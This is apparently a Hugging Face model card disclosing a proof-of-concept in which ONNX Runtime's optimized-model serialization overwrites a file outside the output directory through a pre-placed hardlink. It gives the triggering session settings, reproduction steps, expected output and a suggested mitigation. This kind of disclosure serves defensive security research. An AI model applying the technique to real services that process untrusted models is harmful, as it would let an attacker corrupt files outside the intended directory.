Hugging Face's logo

pragnyanramtha
/
onnxruntime-optimized-hardlink-write-poc

ONNX
security
onnxruntime
external-data
proof-of-concept
Model card Files
xet
 Community

ONNX Runtime Optimized External Initializer Hardlink Overwrite PoC

Benign security proof-of-concept for a conditional ONNX Runtime optimized-model serialization hardlink overwrite.

Summary

ONNX Runtime 1.26.0 can overwrite a controlled file outside the optimized-model output directory when optimized external initializers are written to a filename that already exists as a hardlink.

The PoC creates:

  • outside_dir/outside_target.bin containing BEFORE_ORT_OPT_HARDLINK_WRITE
  • model_dir/optimized.data as a hardlink to that outside target
  • model_dir/source.onnx, a simple ONNX model with a float initializer

Then it runs ONNX Runtime with:

so.optimized_model_filepath = "model_dir/optimized.onnx"
so.add_session_config_entry(
    "session.optimized_model_external_initializers_file_name",
    "optimized.data",
)
so.add_session_config_entry(
    "session.optimized_model_external_initializers_min_size_in_bytes",
    "1",
)

ORT opens model_dir/optimized.data with truncating write semantics and writes optimized external initializer bytes. Because that path is a hardlink, the outside target is overwritten too.

Severity

Medium, CVSS 5.3.

Rationale: controlled local file overwrite under hardlink constraints in an optimizer/converter path. This is weaker than a default loader issue because the application must save optimized external initializers to a predictable filename in an attacker-influenced directory.

Tested Versions

  • onnxruntime==1.26.0
  • onnx==1.21.0
  • Python 3.12.3
  • Linux filesystem with hardlink support

Files

  • verify_poc.py: Generates the model, creates the hardlink, runs ONNX Runtime optimized serialization, and verifies the overwrite.
  • results/runtime_output.txt: Captured local validation output.
  • requirements.txt: Tested dependency versions.

Reproduce 

python -m venv .venv
. .venv/bin/activate
pip install -r requirements.txt

python verify_poc.py

Expected key output:

outside_before=BEFORE_ORT_OPT_HARDLINK_WRITE
hardlink_same_inode=True
hardlink_count=2
outside_after_size=64
outside_after_sha256=58dda328598e2f7fe472621bfc54935aaa354d1a6ebcaf9562cd743fd575eb19
impact=optimized_external_initializer_writer_overwrote_hardlink_target

Impact

If a service optimizes untrusted ONNX models in place or writes optimized external initializer data to a predictable filename inside an attacker-influenced model/output directory, an attacker can pre-place that filename as a hardlink and cause ONNX Runtime to truncate and overwrite the linked outside target.

The PoC is benign and overwrites only a controlled marker file created inside the PoC directory.

Limitations

  • Not remote code execution.
  • Not a default InferenceSession(model_path) loader issue.
  • Requires hardlink creation on the same filesystem.
  • Requires application-controlled optimized-model serialization settings and a predictable external initializer output filename.
  • The overwritten content is ONNX Runtime's optimized external initializer bytes, not arbitrary attacker-chosen bytes.

Artifact Hashes 

1df4fa9449805b590e87ac03abbe6eb0076f2dca8d7908b28ecc072926a0d662  verify_poc.py

The generated runtime files are intentionally not committed because the verifier rebuilds them with local absolute paths.

Suggested Mitigation

When writing optimized external initializer files, open output files defensively and reject existing files with link count greater than one. Prefer exclusive create semantics or post-open inode/link-count validation before truncating external initializer outputs.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support